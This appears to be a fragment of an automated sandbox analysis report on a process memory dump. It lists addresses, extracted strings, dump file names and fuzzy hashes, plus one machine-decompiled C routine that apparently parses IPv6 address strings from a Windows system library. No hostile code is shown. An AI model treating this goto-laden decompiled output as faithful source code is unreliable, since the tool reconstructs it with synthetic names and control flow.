                                                                                                                                                                                    0x026b2477
                                                                                                                                                                                    0x026b247c
                                                                                                                                                                                    0x026b2486
                                                                                                                                                                                    0x026b248b
                                                                                                                                                                                    0x026b2496
                                                                                                                                                                                    0x026b249b
                                                                                                                                                                                    0x026b249d
                                                                                                                                                                                    0x026b24a0
                                                                                                                                                                                    0x026b24a3
                                                                                                                                                                                    0x026b24aa
                                                                                                                                                                                    0x026b24aa
                                                                                                                                                                                    0x026b24a5
                                                                                                                                                                                    0x026b24a5
                                                                                                                                                                                    0x026b24a5
                                                                                                                                                                                    0x026b24ac
                                                                                                                                                                                    0x026b24af
                                                                                                                                                                                    0x026b24b0
                                                                                                                                                                                    0x026b24b3
                                                                                                                                                                                    0x026b24b9
                                                                                                                                                                                    0x026b24ba
                                                                                                                                                                                    0x026b24bb
                                                                                                                                                                                    0x026b24c6
                                                                                                                                                                                    0x026b24cb
                                                                                                                                                                                    0x026b24cd
                                                                                                                                                                                    0x026b24d0
                                                                                                                                                                                    0x026b24d1
                                                                                                                                                                                    0x026b24d4
                                                                                                                                                                                    0x026b24d6
                                                                                                                                                                                    0x026b24d9
                                                                                                                                                                                    0x026b24d9
                                                                                                                                                                                    0x026b24dc
                                                                                                                                                                                    0x026b24df
                                                                                                                                                                                    0x026b24e1
                                                                                                                                                                                    0x026b24e7
                                                                                                                                                                                    0x026b24e9
                                                                                                                                                                                    0x026b24ec
                                                                                                                                                                                    0x026b24ef
                                                                                                                                                                                    0x026b24f2
                                                                                                                                                                                    0x026b24f2
                                                                                                                                                                                    0x026b24ef
                                                                                                                                                                                    0x026b24e7
                                                                                                                                                                                    0x026b24fa
                                                                                                                                                                                    0x026b24ff
                                                                                                                                                                                    0x026b2501
                                                                                                                                                                                    0x026b2503
                                                                                                                                                                                    0x026b2506
                                                                                                                                                                                    0x026b250b
                                                                                                                                                                                    0x0267eb8c
                                                                                                                                                                                    0x0267eb93
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0267eb93
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0267eb99
                                                                                                                                                                                    0x0267ec85
                                                                                                                                                                                    0x0267ec85
                                                                                                                                                                                    0x0267ec85
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 026B24BD
                                                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 026B248D
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 026B24FA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                                                    • Opcode ID: b44753ae9b32db0cdf6235b6e7d1c10a5dc29d1bbaa645bb93f8df1e75b2e719
                                                                                                                                                                                    • Instruction ID: 54f26d3f6b4802d27fa37ca595c5093e711f4b4cfdd47382d2db35a4aed800a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: b44753ae9b32db0cdf6235b6e7d1c10a5dc29d1bbaa645bb93f8df1e75b2e719
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A412570A00204ABDB24DF68DC94FAB77E9EF44720F108649F9699B3C0D735E981CB64
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0268FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                    				signed int _t105;
                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                    				char _t114;
                                                                                                                                                                                    				short _t115;
                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                    				signed short* _t119;
                                                                                                                                                                                    				short _t120;
                                                                                                                                                                                    				char _t122;
                                                                                                                                                                                    				void* _t127;
                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                    				signed short* _t164;
                                                                                                                                                                                    				signed int _t167;
                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t158 = 0;
                                                                                                                                                                                    				_t164 = _a4;
                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                    				_t136 = 0;
                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                                                    					if(_t167 == _t158) {
                                                                                                                                                                                    						break;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t118 = _v20 - _t158;
                                                                                                                                                                                    					if(_t118 == 0) {
                                                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t143 = 2;
                                                                                                                                                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                    								_v28 = 1;
                                                                                                                                                                                    								_v8 = _t143;
                                                                                                                                                                                    								_t136 = _t136 + 1;
                                                                                                                                                                                    								L47:
                                                                                                                                                                                    								_t164 = _t119;
                                                                                                                                                                                    								_v20 = _t143;
                                                                                                                                                                                    								L14:
                                                                                                                                                                                    								if(_v24 == _t158) {
                                                                                                                                                                                    									L19:
                                                                                                                                                                                    									_t164 =  &(_t164[1]);
                                                                                                                                                                                    									_t158 = 0;
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v12 == _t158) {
                                                                                                                                                                                    									if(_v16 > 4) {
                                                                                                                                                                                    										L29:
                                                                                                                                                                                    										return 0xc000000d;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t120 = E0268EE02(_v24, _t158, 0x10);
                                                                                                                                                                                    									_t170 = _t170 + 0xc;
                                                                                                                                                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                                                    									_t136 = _t136 + 1;
                                                                                                                                                                                    									goto L19;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v16 > 3) {
                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t122 = E0268EE02(_v24, _t158, 0xa);
                                                                                                                                                                                    								_t170 = _t170 + 0xc;
                                                                                                                                                                                    								if(_t122 > 0xff) {
                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                                                    								goto L19;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L21:
                                                                                                                                                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							if(E0268685D(_t167, 4) == 0) {
                                                                                                                                                                                    								if(E0268685D(_t167, 0x80) != 0) {
                                                                                                                                                                                    									if(_v12 > 0) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t127 = 1;
                                                                                                                                                                                    									_a7 = 1;
                                                                                                                                                                                    									_v24 = _t164;
                                                                                                                                                                                    									_v20 = 1;
                                                                                                                                                                                    									_v16 = 1;
                                                                                                                                                                                    									L36:
                                                                                                                                                                                    									if(_v20 == _t127) {
                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t158 = 0;
                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_a7 = 0;
                                                                                                                                                                                    							_v24 = _t164;
                                                                                                                                                                                    							_v20 = 1;
                                                                                                                                                                                    							_v16 = 1;
                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t130 = _t118 - 1;
                                                                                                                                                                                    					if(_t130 != 0) {
                                                                                                                                                                                    						if(_t130 == 1) {
                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t127 = 1;
                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_t167 >= 0x80) {
                                                                                                                                                                                    						L7:
                                                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                                                    							_t158 = 0;
                                                                                                                                                                                    							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                                                    									L13:
                                                                                                                                                                                    									_v20 = _t158;
                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v28 != 0) {
                                                                                                                                                                                    									break;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_v28 = _v8 + 1;
                                                                                                                                                                                    								_t143 = 2;
                                                                                                                                                                                    								_v8 = _v8 + _t143;
                                                                                                                                                                                    								goto L47;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                                                    							_t158 = 0;
                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(E0268685D(_t167, 4) != 0) {
                                                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(E0268685D(_t167, 0x80) != 0) {
                                                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                                                    						if(_v12 > 0) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_a7 = 1;
                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				 *_a8 = _t164;
                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                    					if(_v12 != 3) {
                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                                                    					if(_v20 != 1) {
                                                                                                                                                                                    						if(_v20 != 2) {
                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                    						L65:
                                                                                                                                                                                    						_t105 = _v28;
                                                                                                                                                                                    						if(_t105 != 0) {
                                                                                                                                                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                                                    							E02668980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                                                    							_t110 = 8;
                                                                                                                                                                                    							E0265DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						return 0;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                    						if(_v16 > 3) {
                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t114 = E0268EE02(_v24, 0, 0xa);
                                                                                                                                                                                    						_t170 = _t170 + 0xc;
                                                                                                                                                                                    						if(_t114 > 0xff) {
                                                                                                                                                                                    							goto L29;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                                                    						goto L65;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v16 > 4) {
                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t115 = E0268EE02(_v24, 0, 0x10);
                                                                                                                                                                                    					_t170 = _t170 + 0xc;
                                                                                                                                                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                                                    					goto L65;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					goto L29;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}

























                                                                                                                                                                                    0x0268fcd1
                                                                                                                                                                                    0x0268fcd6
                                                                                                                                                                                    0x0268fcd9
                                                                                                                                                                                    0x0268fcdc
                                                                                                                                                                                    0x0268fcdf
                                                                                                                                                                                    0x0268fce2
                                                                                                                                                                                    0x0268fce5
                                                                                                                                                                                    0x0268fce8
                                                                                                                                                                                    0x0268fceb
                                                                                                                                                                                    0x0268fced
                                                                                                                                                                                    0x0268fced
                                                                                                                                                                                    0x0268fcf3
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fcfc
                                                                                                                                                                                    0x0268fcfe
                                                                                                                                                                                    0x0268fdc1
                                                                                                                                                                                    0x026becbd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beccc
                                                                                                                                                                                    0x026beccc
                                                                                                                                                                                    0x026becd2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026becdf
                                                                                                                                                                                    0x026bece0
                                                                                                                                                                                    0x026bece4
                                                                                                                                                                                    0x026beceb
                                                                                                                                                                                    0x026becee
                                                                                                                                                                                    0x026beca8
                                                                                                                                                                                    0x026beca8
                                                                                                                                                                                    0x026becaa
                                                                                                                                                                                    0x0268fd76
                                                                                                                                                                                    0x0268fd79
                                                                                                                                                                                    0x0268fdb4
                                                                                                                                                                                    0x0268fdb5
                                                                                                                                                                                    0x0268fdb6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fdb6
                                                                                                                                                                                    0x0268fd7e
                                                                                                                                                                                    0x026becfc
                                                                                                                                                                                    0x0268fe2f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fe2f
                                                                                                                                                                                    0x026bed08
                                                                                                                                                                                    0x026bed0f
                                                                                                                                                                                    0x026bed17
                                                                                                                                                                                    0x026bed1b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bed1b
                                                                                                                                                                                    0x0268fd88
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fd94
                                                                                                                                                                                    0x0268fd99
                                                                                                                                                                                    0x0268fda1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fdb0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fdb0
                                                                                                                                                                                    0x026becbd
                                                                                                                                                                                    0x0268fdc7
                                                                                                                                                                                    0x0268fdcb
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fdd7
                                                                                                                                                                                    0x0268fde3
                                                                                                                                                                                    0x0268fe06
                                                                                                                                                                                    0x026a1fe7
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a1fef
                                                                                                                                                                                    0x026a1ff0
                                                                                                                                                                                    0x026a1ff4
                                                                                                                                                                                    0x026a1ff7
                                                                                                                                                                                    0x026a1ffa
                                                                                                                                                                                    0x026a1ffd
                                                                                                                                                                                    0x026a2000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026becf1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026becf1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fe06
                                                                                                                                                                                    0x0268fde8
                                                                                                                                                                                    0x0268fdec
                                                                                                                                                                                    0x0268fdef
                                                                                                                                                                                    0x0268fdf2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fdf2
                                                                                                                                                                                    0x0268fdcb
                                                                                                                                                                                    0x0268fd04
                                                                                                                                                                                    0x0268fd05
                                                                                                                                                                                    0x026bec67
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bec6f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bec6f
                                                                                                                                                                                    0x0268fd13
                                                                                                                                                                                    0x0268fd3c
                                                                                                                                                                                    0x0268fd40
                                                                                                                                                                                    0x026bec75
                                                                                                                                                                                    0x026bec7a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bec8a
                                                                                                                                                                                    0x026bec8a
                                                                                                                                                                                    0x026bec90
                                                                                                                                                                                    0x026becb2
                                                                                                                                                                                    0x0268fd73
                                                                                                                                                                                    0x0268fd73
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fd73
                                                                                                                                                                                    0x026bec95
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beca1
                                                                                                                                                                                    0x026beca4
                                                                                                                                                                                    0x026beca5
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beca5
                                                                                                                                                                                    0x026bec7a
                                                                                                                                                                                    0x0268fd4a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fd6e
                                                                                                                                                                                    0x0268fd6e
                                                                                                                                                                                    0x0268fd71
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fd71
                                                                                                                                                                                    0x0268fd4a
                                                                                                                                                                                    0x0268fd21
                                                                                                                                                                                    0x0269a3a1
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0269a3a1
                                                                                                                                                                                    0x0268fd36
                                                                                                                                                                                    0x026a200b
                                                                                                                                                                                    0x026a2012
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a2018
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a2018
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0268fd36
                                                                                                                                                                                    0x0268fe0f
                                                                                                                                                                                    0x0268fe16
                                                                                                                                                                                    0x0269a3ad
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0269a3b3
                                                                                                                                                                                    0x0269a3b3
                                                                                                                                                                                    0x0268fe1f
                                                                                                                                                                                    0x026bed25
                                                                                                                                                                                    0x026bed86
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bed91
                                                                                                                                                                                    0x026bed95
                                                                                                                                                                                    0x026bed95
                                                                                                                                                                                    0x026bed9a
                                                                                                                                                                                    0x026bedad
                                                                                                                                                                                    0x026bedb3
                                                                                                                                                                                    0x026bedba
                                                                                                                                                                                    0x026bedc4
                                                                                                                                                                                    0x026bedc9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bedcc
                                                                                                                                                                                    0x026bed2a
                                                                                                                                                                                    0x026bed55
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bed61
                                                                                                                                                                                    0x026bed66
                                                                                                                                                                                    0x026bed6e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bed7d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bed7d
                                                                                                                                                                                    0x026bed30
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026bed3c
                                                                                                                                                                                    0x026bed43
                                                                                                                                                                                    0x026bed4b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction ID: a86df14cdc383b83e9e3e83c6ab2fadfbd7186f1193650c2b42f549c968770d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB91C432D0020AEEDF24EF58C8487EEB7B4FF45309FA0816AD415E7691EB714A81CB95
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%